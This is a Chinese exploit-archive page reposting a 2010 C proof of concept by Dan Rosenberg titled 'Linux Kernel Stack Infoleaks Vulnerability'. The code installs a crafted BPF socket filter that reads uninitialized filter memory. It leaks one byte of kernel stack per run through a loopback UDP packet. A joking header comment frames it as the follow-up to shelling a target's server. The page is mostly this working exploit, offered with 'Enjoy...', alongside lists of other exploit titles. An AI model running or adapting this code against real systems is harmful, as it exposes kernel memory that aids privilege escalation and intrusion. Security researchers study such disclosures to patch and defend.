首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Linux Kernel Stack Infoleaks Vulnerability
来源:vfocus.net 作者:Rosenberg 发布时间:2010-11-11  

Enjoy...

-Dan


/*
 * You've done it.  After hours of gdb and caffeine, you've finally got a shell
 * on your target's server.  Maybe next time they will think twice about
 * running MyFirstCompSciProjectFTPD on a production machine.  As you take
 * another sip of Mountain Dew and pick some of the cheetos out of your beard,
 * you begin to plan your next move - it's time to tackle the kernel.
 *
 * What should be your goal?  Privilege escalation?  That's impossible, there's
 * no such thing as a privilege escalation vulnerability on Linux.  Denial of
 * service?  What are you, some kind of script kiddie?  No, the answer is
 * obvious.  You must read the uninitialized bytes of the kernel stack, since
 * these bytes contain all the secrets of the universe and the meaning of life.
 *
 * How can you accomplish this insidious feat?  You immediately discard the
 * notion of looking for uninitialized struct members that are copied back to
 * userspace, since you clearly need something far more elite.  In order to
 * prove your superiority, your exploit must be as sophisticated as your taste
 * in obscure electronic music.  After scanning the kernel source for good
 * candidates, you find your target and begin to code...
 *
 * by Dan Rosenberg
 *
 * Greets to kees, taviso, jono, spender, hawkes, and bla
 *
 */

#include <string.h>
#include <stdio.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <unistd.h>
#include <stdlib.h>
#include <linux/filter.h>

#define PORT 37337

int transfer(int sendsock, int recvsock)
{

 struct sockaddr_in addr;
 char buf[512];
 int len = sizeof(addr);

 memset(buf, 0, sizeof(buf));
 
 if (fork())
  return recvfrom(recvsock, buf, 512, 0, (struct sockaddr *)&addr, &len);

 sleep(1);

 memset(&addr, 0, sizeof(addr));
 addr.sin_family = AF_INET;
 addr.sin_port = htons(PORT);
 addr.sin_addr.s_addr = inet_addr("127.0.0.1");
 
 sendto(sendsock, buf, 512, 0, (struct sockaddr *)&addr, len);

 exit(0);

}

int main(int argc, char * argv[])
{

 int sendsock, recvsock, ret;
 unsigned int val; 
 struct sockaddr_in addr;
 struct sock_fprog fprog;
 struct sock_filter filters[5];

 if (argc != 2) {
  printf("[*] Usage: %s offset (0-63)\n", argv[0]);
  return -1;
 }

 val = atoi(argv[1]);

 if (val > 63) {
  printf("[*] Invalid byte offset (must be 0-63)\n");
  return -1;
 }

 recvsock = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
 sendsock = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);

 if (recvsock < 0 || sendsock < 0) {
  printf("[*] Could not create sockets.\n");
  return -1;
 }

 memset(&addr, 0, sizeof(addr));
 addr.sin_family = AF_INET;
 addr.sin_port = htons(PORT);
 addr.sin_addr.s_addr = htonl(INADDR_ANY);

 if (bind(recvsock, (struct sockaddr *)&addr, sizeof(addr)) < 0) {
  printf("[*] Could not bind socket.\n");
  return -1;
 }

 memset(&fprog, 0, sizeof(fprog));
 memset(filters, 0, sizeof(filters));

 filters[0].code = BPF_LD|BPF_MEM;
 filters[0].k = (val & ~0x3) / 4;

 filters[1].code = BPF_ALU|BPF_AND|BPF_K;
 filters[1].k = 0xff << ((val % 4) * 8);

 filters[2].code = BPF_ALU|BPF_RSH|BPF_K;
 filters[2].k = (val % 4) * 8;

 filters[3].code = BPF_ALU|BPF_ADD|BPF_K;
 filters[3].k = 256;

 filters[4].code = BPF_RET|BPF_A;

 fprog.len = 5;
 fprog.filter = filters;

 if (setsockopt(recvsock, SOL_SOCKET, SO_ATTACH_FILTER, &fprog, sizeof(fprog)) < 0) {
  printf("[*] Failed to install filter.\n");
  return -1;
 }

 ret = transfer(sendsock, recvsock);

 printf("[*] Your byte: 0x%.02x\n", ret - 248);

}


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Free CD to MP3 Converter 3.1 B
·Qtweb Browser v3.5 Buffer Over
·Free CD to MP3 Converter v3.1
·FileCOPA FTP Server 6.01 direc
·FCKeditor 2.x <= 2.4.3 Arbitra
·IBM OmniFind Crawler Denial of
·D-Link DIR-300 authentication
·IBM OmniFind Privilege Escalat
·Mp3-Nator 2.0 Buffer Overflow
·IBM OmniFind Buffer Overflow V
·E-Xoopport v3.1 eCal display.p
·IBM OmniFind CSRF Vulnerabilit
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved